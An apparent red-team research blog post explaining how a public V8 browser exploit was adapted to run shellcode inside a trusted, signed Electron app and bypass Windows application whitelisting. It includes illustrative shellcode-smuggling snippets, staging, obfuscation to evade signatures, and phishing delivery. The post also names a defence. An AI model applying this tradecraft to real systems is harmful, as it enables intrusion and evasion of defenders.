
Operationalizing browser exploits to bypass Windows Defender Application Control (WDAC)

14 May 2025

Authors

Valentina Palmiotti

Vulnerability and Exploit Researcher

Adversary Services, IBM X-Force

Windows Defender Application Control (WDAC) is a Windows security feature that helps prevent unauthorized code (like malware or untrusted executables and scripts) from running on a system. It's an application whitelisting mechanism that enforces policies allowing only explicitly trusted executables, scripts and drivers to run. It's frequently used in high-assurance or tightly controlled environments where security and system integrity are critical, like the ones the X-Force Red Adversary Simulation team is engaged to test.

A few weeks ago, my colleague Bobby Cooke published a blog post detailing a method for bypassing even the strictest WDAC policies by backdooring trusted Electron applications. I highly recommend reading his blog post to get a sense of how Electron applications use Node.js and how they can be backdoored.

As part of that research, he also open-sourced Loki C2, a Node.js-based command and control framework. Thanks to Bobby and Dylan Tran’s excellent work developing Loki C2, the X-Force Adversary Simulation team has managed to gain code execution on engagements in hardened environments that employ WDAC.

So, where does this research come in? The aforementioned technique does have one shortcoming: you are limited to executing JavaScript code only, and you can’t execute native code, such as loading DLLs or running EXEs. You also can’t execute shellcode to launch a stage 2 C2 payload. This blog post covers a technique we utilized to get around those restrictions.

To start, Bobby and I began reverse engineering signed Node.js modules loaded by Electron applications, looking for vulnerabilities that could grant low-level, instruction-level code execution. After some initial exploration and at the suggestion of jeffssh, my attention shifted to the V8 engine used by Node.js and by Chrome.

Bring your own vulnerable application

Instead of finding a vulnerability in a Node.js module, what about exploiting the V8 engine with an N-day?

The attack scenario is a familiar one: bring along a vulnerable but trusted binary, and abuse the fact that it is trusted to gain a foothold on the system. In this case, we use a trusted Electron application with a vulnerable version of V8, replacing main.js with a V8 exploit that executes stage 2 as the payload, and voila, we have native shellcode execution. If the exploited application is whitelisted/signed by a trusted entity (such as Microsoft) and would normally be allowed to run under the employed WDAC policy, it can be used as a vessel for the malicious payload.

In addition to allowing us to freely execute shellcode, this approach has the benefit of executing that shellcode in the context of a browser-like process. Behavior that might otherwise be flagged as suspicious by EDR, such as having RWX memory mapped for Just-In-Time (JIT) code, looks normal for a browser.



Prior work

This approach seemed straightforward enough, but I did have some open questions. Would a public Chrome V8 N-day exploit really work inside an Electron app? How does the V8 engine used in Chrome vary from the one in Node.js? What modifications will the exploit need? How can I debug this?

It turns out there is existing public work on V8 exploitation in Electron apps, which, very sadly for me, I didn't find until after I was done. Turb0 does an excellent job of covering the (somewhat agonizing) process of adapting a public V8 exploit and its corresponding read/write primitives to work inside an Electron application. Turb0's blog post already covers a lot of the in-depth technical details of what I had to deal with, and I highly recommend checking it out. The rest of this blog post focuses on the remaining stages of the exploit development cycle as it pertains to targeting Windows with the specific goal of creating a WDAC bypass, and on issues I encountered operationalizing the exploit for real-world use.

Version targeting

The very first thing I needed to do was figure out the exact targets: I needed to pick a trusted Electron application and choose a vulnerability to exploit it with. I had very little browser exploitation experience before this, so the chosen vulnerability needed to have a public exploit to use as a starting point.

I wasn't sure how Chrome's V8 versions mapped to the version of V8 Electron uses, or how to tell if a given Electron release was really vulnerable. Electron's version of V8 often lags behind the latest version of Chrome's V8, and Electron maintainers backport important security patches from newer versions into the version they've frozen for a particular Electron release. That means even if Electron uses an older version of V8, it isn't necessarily vulnerable to a given bug, since a fix could have been backported. The cherry-picked patches they apply are stored here.

I decided the easiest approach would be to use a vulnerability that was patched after the application version was released. That way, there would be no chance that version of the app had been patched yet. After some digging, I found downloads for the past ~2 years of VSCode releases. I had a decent range of vulnerable Microsoft-signed applications to pick from 😊.

Building and debugging

To start, I simply took a recent public V8 exploit PoC and backdoored the vulnerable Electron app with it, replacing main.js with the exploit, and crossed my fingers. Maybe it would just be that easy, right? I was hoping for at least a crash. To no one's surprise, nothing happened when I launched the app. Begrudgingly, I knew I was going to need to build V8 to understand what was going on at a deeper level. By building V8 myself, I could build a debug version of the d8 shell, dig into the depths of the exploit, and adjust it for the specific version I was targeting.

What’s where and when? - Exploiting on different OSes and versions

My first goal was to establish a “ground truth” – replicating the exact environment where the exploit is known to work. Then, I could examine the differences between that version and the version I was targeting to understand what was going wrong.

Most of the public V8 exploits that I found targeted Linux. So I started by compiling V8 on Linux, checking out the exact commit that the public exploit I chose was targeting. I then ran the exploit to make sure it worked. Thankfully, it did. I now had my ground truth.

From there, I compiled the version of V8 that I was targeting (the same as used by the Electron app), but on Linux. The exploit didn't work right off the bat. The benefit of building a project yourself is that you can have as much introspection into the code as you need. In particular, V8 ships d8, the standalone shell for the V8 JavaScript engine, primarily used for testing, debugging and running JavaScript and WebAssembly code outside of a browser or Node.js environment. d8 exposes internal debug features via the --allow-natives-syntax flag, notably %DebugPrint(value), which prints the internal tagged representation of the value inside the V8 engine, including its address in memory.
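For example, a debug d8 session looks roughly like this (the address and the object layout shown here are illustrative, not from the actual target):

```
$ ./d8 --allow-natives-syntax
d8> const arr = [1.1, 2.2, 3.3];
d8> %DebugPrint(arr);
DebugPrint: 0x3a4d08049119: [JSArray]
 - map: 0x... <Map(PACKED_DOUBLE_ELEMENTS)> ...
 - elements: 0x... <FixedDoubleArray[3]> [PACKED_DOUBLE_ELEMENTS]
 ...
```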

With this, I could print the addresses of objects of interest and adjust the hardcoded offsets of the public exploit. Now I was getting somewhere. I just needed to port my exploit over to Windows.

Compiling an older version of V8 on Windows gave me a lot of headaches. I needed to fix a bunch of problems with dependencies, so I made some dubious internal code modifications. The details escape me now -- my brain has blocked them out for my own protection. After hours of struggling, I was finally able to compile the version I needed! To my surprise, the Linux-modified exploit worked on Windows with no adjustments.

Now, all that was left was to test the exploit on the Electron app and hold my breath... Oops, didn’t work! But why?

At first, I was hopeful because the target did crash. After all, I hadn't adapted the Linux payload for Windows, so I couldn't expect anything interesting to happen. To confirm the behavior, I changed the exploit payload to execute at address 0x4141414141. This is a common technique exploit writers use to see and prove they have obtained control of the program by controlling the instruction pointer. However, after looking at the crash in WinDbg, I wasn't seeing what I wanted: I was getting an access violation when overwriting the targeted function pointer.

Remember the Electron cherry-picking of V8 commits I was talking about before? It turns out that even though the app was vulnerable to the bug I was exploiting, the sandbox escape method the public exploit used had already been patched via a cherry-pick. If you aren't familiar with the V8 sandbox/memory cage, you can read about it here. Essentially, it's a way to make V8 exploitation more difficult in the case of a vulnerability.

To work out what was happening, I needed to again build the targeted version of V8, this time applying the cherry-picked patches. In addition to the security patches, the V8 version Electron uses also carries Node.js-specific patches. It took me a long time to realize that I even needed to do this, as how Electron and Node.js deal with their various dependencies wasn't immediately clear.

After a day or two of trying to make sure the version of V8 I was compiling was *identical* to my target and also reading up on recent sandbox escape techniques, I made progress. I was able to find an escape technique that would work for my target. After adjusting the exploit, I was finally able to crash the app with control of the instruction pointer. A sweet victory, I saw the end in sight...

Adapting exploit with a practical payload

At this point, all that was left to do was modify the public exploit's payload to run our C2 payload instead. This seemingly straightforward change proved to be more annoying than I thought. The public exploit's Linux payload was a simple shell-popping payload only a few bytes in size. The C2's payload was... much larger than that.

If you've written shellcode before, you'll know that writing Windows shellcode is more annoying than writing it for Linux, mainly because there's no simple way to make direct syscalls in a position-independent way like you can on Linux. The payload also needed to be "JOP smuggled" inside a floating-point array.
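As a sketch of the smuggling itself (the helper and gadget bytes below are illustrative, not the actual payload): each 8-byte chunk of instructions is reinterpreted as the IEEE-754 double with the same bit pattern, so that a JIT-compiled array of doubles embeds the raw instruction bytes verbatim in executable memory.

```javascript
// Reinterpret up to 8 instruction bytes as a double with an identical bit
// pattern (gadget bytes are illustrative, not from the real exploit).
function bytesToDouble(bytes) {
  const buf = new ArrayBuffer(8);
  new Uint8Array(buf).set(bytes); // little-endian byte order, as on x86-64
  return new Float64Array(buf)[0];
}

// Illustrative chunk: mov eax, 0x1337 ; jmp short +6 ; nop
const gadget = [0xb8, 0x37, 0x13, 0x00, 0x00, 0xeb, 0x06, 0x90];
const smuggled = [bytesToDouble(gadget) /* , ...more 8-byte chunks */];
```

Execution then jumps into the middle of the JIT'd float constants, with each chunk typically ending in a short jump to the next one.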

Obviously, the entire stage 2 C2 payload (which was several thousand bytes in size) could not execute like this. So, I needed to write a bootstrap payload that would map an executable page, copy the final payload to it and then jump to it.

Argument smuggling

The issue with the bootstrap payload was that while I had program control, I did not have a way to pass arguments to the payload that got executed. My smuggled shellcode would not know the address of the final payload to copy from. I got around this with a technique I coined "argument smuggling."

I knew that the address of the overwritten JSFunction object would be stored in the rcx register. So, using the arbitrary write primitive, I stored the address of the mapped page in one of the object's fields that wouldn't be needed. This took a bit of trial and error, as overwriting some offsets caused crashes. I did the same for the value to be copied and the offset at which to copy it. The field offsets could be hardcoded into the shellcode, so it would know where to copy the payload from. I then called the payload n times, where n is the number of bytes to copy.
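A toy model of the idea (offsets and memory here are simulated; the real exploit used its arbitrary-write primitive against the live JSFunction object, whose address lands in rcx when the stomped function is called):

```javascript
// Stand-in for the JSFunction object's backing memory.
const memory = new DataView(new ArrayBuffer(0x100));

// Illustrative "unused field" offsets, hardcoded to match the shellcode:
const FIELD_MAPPED_PAGE = 0x28;  // where the RWX page address is stashed
const FIELD_CHUNK_VALUE = 0x30;  // the 8 payload bytes to copy this call
const FIELD_CHUNK_OFFSET = 0x38; // destination offset within the RWX page

function arbWrite64(offset, value) {
  memory.setBigUint64(offset, value, true); // little-endian, as on x86-64
}

// One iteration of the copy loop: smuggle the arguments, then invoke the
// stomped JSFunction so the bootstrap shellcode reads them back via rcx.
arbWrite64(FIELD_MAPPED_PAGE, 0x1f0000000000n);
arbWrite64(FIELD_CHUNK_VALUE, 0x9090909090c3c031n); // xor eax,eax ; ret ; nops
arbWrite64(FIELD_CHUNK_OFFSET, 0n);
```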

TurboFan JIT optimization

TurboFan, V8's optimizing compiler, threw some wrenches into my plans. Due to TurboFan's optimizations, smuggling sequences of instructions that translated into multiple floating-point constants of the same value would result in only one instance of that value in memory. This imposed limitations on how often instructions could be repeated. I got around it by making my shellcode as compact as possible, and by varying the position of the smuggled instructions whenever I absolutely needed to repeat one, such that the floating-point value was different and there were no repeat entries.
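The position-varying trick can be sketched like this (helper and instruction bytes are illustrative): if the same instruction must be smuggled twice, shifting where it sits inside the 8-byte chunk (padding with nops) produces two doubles with different bit patterns, so they are not folded into a single constant.

```javascript
// Reinterpret an 8-byte chunk as a double (illustrative helper).
function chunkToDouble(bytes) {
  const buf = new ArrayBuffer(8);
  new Uint8Array(buf).set(bytes);
  return new Float64Array(buf)[0];
}

const NOP = 0x90;
const insn = [0x48, 0x31, 0xc0]; // xor rax, rax

// Same instruction, two distinct float constants via different nop placement:
const first = chunkToDouble([...insn, NOP, NOP, NOP, NOP, NOP]);
const second = chunkToDouble([NOP, ...insn, NOP, NOP, NOP, NOP]);
// first !== second, so both constants survive in memory.
```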

I also ran into issues copying shellcode if the stage 2 payload was too large, probably due to the number of times I needed to call the same stomped JSFunction and TurboFan trying to optimize this. I eventually got around it by copying and pasting multiple loops of "WriteShellcode" instead of one big loop. Horrifically ugly, but it worked! Later, Bobby and Dylan swapped the C2 payload for a stager that retrieved the larger payload from blob storage, so the final payload didn't need to be stored on disk. This also helped keep the file size of main.js reasonable.

Inconsistent offsets

Preparing exploits for real operational use should always include testing in different environments. For this engagement, we did not know what environment the payload would be executing in, just that it was a Windows system that likely had WDAC enabled. The exploit therefore needed to work regardless of the OS version. I was confident that since the application's V8 version and all dependencies were contained within the app, not much variability would be encountered. I was incorrect in that assumption.

For reasons I don’t understand, the offset of the vulnerable function pointer to overwrite changed across Windows versions. This didn’t make sense because as I understand it, the offset distance is determined by the V8 JIT engine, whose libraries are loaded directly from the application package. This means that the exact same V8 libraries are loaded regardless of the OS. To make matters more confusing, the variation didn’t seem to follow any sort of pattern. The offset was sometimes off by 4 bytes on some versions of Windows (both older and newer). This was particularly annoying because there was no way (from what I could tell) to glean the proper offset from within the JavaScript exploit. The only way to calculate it was to utilize the debugging shell to read the memory address and do the math, which was obviously not an option from within the production Electron Application. TLDR: offsets variation can’t be calculated at exploit runtime.

Just-in-time exploit engineering

To get around the inconsistent offset issue, Bobby and Dylan re-engineered the exploit so that main.js would launch the exploit multiple times, trying the different possible offsets until one succeeded. This was done by having the initial Code process perform a loop that spawned child processes, each attempting the exploit with a unique offset. If the exploit failed, the child process was terminated. If it succeeded, the shellcode would execute and write a mutex file before deploying the stage 2 C2. Once the exploit succeeded, the initial process would exit the loop and sleep forever.
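The retry loop reduces to something like the following sketch (candidate offsets and the helper are illustrative; in the real payload each attempt ran in a separate child process, since a wrong offset crashes the attempting process, and success was signaled via the mutex file):

```javascript
// Illustrative candidate offsets for the vulnerable function pointer.
const CANDIDATE_OFFSETS = [0x18, 0x1c, 0x20, 0x24];

// attemptWithOffset stands in for spawning a child process that runs the
// exploit with one offset and reporting whether the mutex file appeared.
function bruteForceOffset(attemptWithOffset) {
  for (const offset of CANDIDATE_OFFSETS) {
    try {
      if (attemptWithOffset(offset)) return offset; // success: stage 2 deployed
    } catch (_) {
      // simulated crash: wrong offset, move on to the next candidate
    }
  }
  return null; // no candidate worked
}
```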

While this did mean that wrong offset attempts would cause crashes, our testing revealed no visible errors to the user, and the application functionality would still appear to work seamlessly. While not the cleanest solution and somewhat noisy because of the crashes, time was of the essence. This is what we call in the business "JIT xdev," and it worked perfectly for our needs.

JS obfuscation and CI/CD payload

We obviously didn't want the exploit to be obvious if we were caught and someone analyzed the application's main.js entry point. To avoid that, we applied a JavaScript obfuscator to the exploit code, which made it virtually incomprehensible to the human eye. Thanks to the talents and dedication of Chris Spehn, who maintains the team's payload CI/CD pipeline, we were able to streamline the delivery of this payload and re-obfuscate the code each time the payload was generated, so we could reuse the application indefinitely with different exploit code each time. This kept the payload from being signatured. It proved especially useful since, sadly, the first time we tried to use the capability, we were caught because the user flagged the phishing email 🙁. Interestingly, while the client's blue team analyzed the application from the phishing email, they did not glean its purpose, nor did they identify the embedded V8 exploit.

Remaining open questions

I still don’t quite understand why JITted function offsets were OS dependent, since all of the relevant V8 libraries are supposed to be bundled within the Electron application. If anyone has any idea of why this is, please let me know!

Future security considerations

Electron has rolled out an experimental integrity feature that verifies the integrity of all the application's files at runtime. It has been available for macOS since Electron 16 and for Windows since Electron 30. Application developers can enable this Electron fuse to ensure that none of the application files are tampered with; if they are, the process automatically exits and nothing gets executed.

This feature prevents modifying any of the Electron app's packaged files, including main.js, and thwarts the techniques discussed here. However, it has yet to be adopted by the most popular applications. Even if and when the feature sees more widespread use, older, pre-integrity-fuse versions of an application will remain vulnerable and usable for this attack.
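For developers, flipping the integrity fuse on a packaged binary with the @electron/fuses helper looks roughly like the following sketch (the binary path is illustrative, and the option names are per that package's documentation at the time of writing; verify against the version you use):

```js
// Sketch: enabling Electron integrity fuses on a packaged app binary.
// Requires the @electron/fuses npm package.
const { flipFuses, FuseVersion, FuseV1Options } = require('@electron/fuses');

flipFuses('out/MyApp/MyApp.exe', {
  version: FuseVersion.V1,
  [FuseV1Options.EnableEmbeddedAsarIntegrityValidation]: true, // hash-check app.asar at load
  [FuseV1Options.OnlyLoadAppFromAsar]: true, // refuse loose, unpacked app code
}).then(() => console.log('fuses flipped'));
```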

Acknowledgements

Bobby Cooke & Dylan Tran – Helping operationalize the exploit

Dylan Tran – Diagram creation

Chris Spehn – Integrating this payload into our CI/CD pipeline (and all of the other thankless DevOps work you've done for the team)

jeffssh – Inspiration

j j – Being a master V8 hacker whose prolific V8 PoCs helped immensely

